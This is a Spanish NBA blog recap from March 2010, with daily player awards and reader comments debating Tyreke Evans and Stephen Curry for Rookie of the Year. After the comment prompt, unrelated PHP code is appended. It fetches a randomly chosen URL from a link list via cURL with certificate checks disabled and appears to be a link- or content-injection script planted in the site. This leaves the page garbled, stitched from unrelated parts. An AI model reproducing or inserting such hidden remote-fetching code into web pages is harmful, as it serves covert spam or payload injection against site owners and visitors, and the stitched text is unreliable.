La Crónica (14/03/2010)

15 de March de 2010 por TheDeerHunter

Ayer escurrimos sutilmente el bulto, aunque tampoco es que hubiera mucho reseñable más allá del tropezón de Dallas en New York y el bombardeo de los Warriors a los Raptors.

Anoche en cambio hubo mucho y bueno, empezando por el derbi Boston@Cleveland. Los Celtics pelearon con el Big Three + Rondo completando una buena actuación pero esa defensa ya no es la que era capaz de anular a LeBron cuando se lo proponían. Ninguna ayuda les llegó desde el banquillo y todo fue un querer y no poder desde el principio. Siempre se puede acudir impotentes al “hack a LeBron” como antes lo hicieron otros equipos más modestos. Correr al “elegido” a golpes no funciona en absoluto para ganar un partido… pero al menos uno se desahoga. Resulta admirable lo bien que se lo toma el chaval. Algo sin precedentes desde Shaq. Con este partido, los Celtics culminan un asombroso 1-9 contra sus rivales más ilustres en el Este. Parece una prueba irrefutable de que no podrán pasar de 2ª ronda.

A Orlando, por su parte, le sentó fatal el “back to back”. Con Barnes lesionado, Pietrus se acogió a la moda de dejarnos mal en nuestros comentarios y fue de lo poco bueno que hubo en su equipo. Howard y Carter estuvieron francamente bien, pero el resto fue una banda, sobre todo defensivamente. Los Bobcats no contaban con Gerald Wallace y aún así ganaron con cierta solvencia. Stephen Jackson estuvo sensacional y vuelve la sensación de que este equipo puede amargar la vida a mucha gente en playoffs.

Otra sorpresa relativa fue la victoria de los Thunder frente a los Jazz. No es tanto el resultado del partido en sí ni la animalada de partido que se cascaron Durant y Westbrook. El equipo de Oklahoma se pone a tiro de piedra de la 4ª plaza del Oeste, ocupada ahora mismo por los Jazz. Absolutamente increíble la campaña que se están marcando los chavales.

Se enfrentaron, también, las dos octavas plazas de ambas conferencias. Los Blazers cuajaron un partido muy serio, con 6 hombres en dobles figuras. Los Raptors, en cambio, ahora mismo son un “sálvese quien pueda”, los únicos que pueden lograr hacer resucitar a los Bulls, que ya estaban entregados. Una auténtica calamidad.

Otros resultados, todos con equipos de postemparada involucrados: Los Bucks se cargaron a los Pacers, con Jerry Stackhouse siendo el mejor de su equipo; los “Wade-Heat” doblegaron a los Sixers y los Suns se comieron a los Hornets.

Por último, los Kings ganaron a los Wolves en la cola de la liga… pero Tyreke volvió a rozar otro triple doble.

PREMIOS

MVP: Segundo MVP diario en poco tiempo para Tyreke Evans al que el apartado de rookies se le queda más que pequeño. Sus números, 29 puntos, 11 asistencias y 9 rebotes son propios de un Lebron James (30-8-7) o un Dwayne Wade que anoche también fue de los destacados con 38 puntazos. Amare Stoudamire, con 36 puntos y 12 rebotes, también merece ser destacado.

Rookie: Obviando al seguro RoY de esta temporada, el premio del día se lo reparten, por un lado otro habitual, Marcus Thorton, que anotó 28 puntos y una relativa sorpresa, Walter Matthews que se fue a los 29. Sin duda, el traspaso de Ronnie Brewer le ha beneficado enormemente.

Sorpresa: Donte Greene se está consolidando en los Kings y anoche disputó su quinto partido consecutivo como titular. Para celebrarlo anotó 19 puntos a los que añadió 8 rebotes. Carlos Arroyo, titular en los Heat, consiguió un doble-doble en la victoria de los Heat.

Decepción: Triste partido de Rasheed Wallace, que está lejos de convertirse en un revuisivo saliendo desde el banquillo. 5 puntos y 4 rebotes con una sola canasta anotada de 8 intentos. La actuación de Jameer Nelson también es para hacérselo mirar: 4 puntos y 3asistencias con un 2 de 10 en 33 minutos. Deberán mejorar bastante si sus equipos quieren optar a algo grande este año.

Esfuerzo en vano: Durant y Westbrook le amargaron el día a Deron Williams que cuajó un sensacional partidos con 27 puntos y 14 asistencias. Dwight Howard y sus 27 puntos y 16 rebotes tampoco encontraron premio.

Comenta

5 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Pues, no veo yo tan tan claro el ROY para Tyreke, Curry últimamente está de escándalo, no descarto uno compartido.

      Citar

  2. Txusma dice:
    #2

    Jugar en los Warriors debería restar puntos… 😀

      Citar

  3. sayim dice:
    #3

    Estoy con Txusma, equipos como Warriors, Knicks… inflan las estadisticas al hacer los partidos locos y jugar sin defensas. Independientemente de los numeros (mejores en el caso de Evans), este ha demostrado que es mejor jugador, es un lider y que va a ser una estrella de la Liga. De Curry no se puede decir lo mismo

      Citar

  4. Rompe dice:
    #4

    Últimamente hasta Collison o Thorton, como Curry, podrían luchar por el ROY. La diferencia está en que éstos han destacado desde mitad de temporada en adelante, como Jennings lo hizo en la primera mitad. Evans, en cambio, ha estado a un gran nivel todo el año. Creo que no debería haber discusión en este galardón.

    Por cierto, comentar el partidazo de Scola el sábado noche, con 44 puntazos y un 20/25!

      Citar

  5. Vader dice:
    #5

    Totalmente de acuerdo el RoY para Evans sin discusión!!! Es ya una estrella de la liga y el lider de su franquicia de forma clara. Sólo los elegidos causan un impacto tan inmediato. Por cierto que ganas tengo de ver los dos próximos partidos NBA de los viernes en Cuatro!! Dan a los Thunder y me muero por ver a Durant jugando, pedazo de jugador y futuro MVP en los próximos años.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>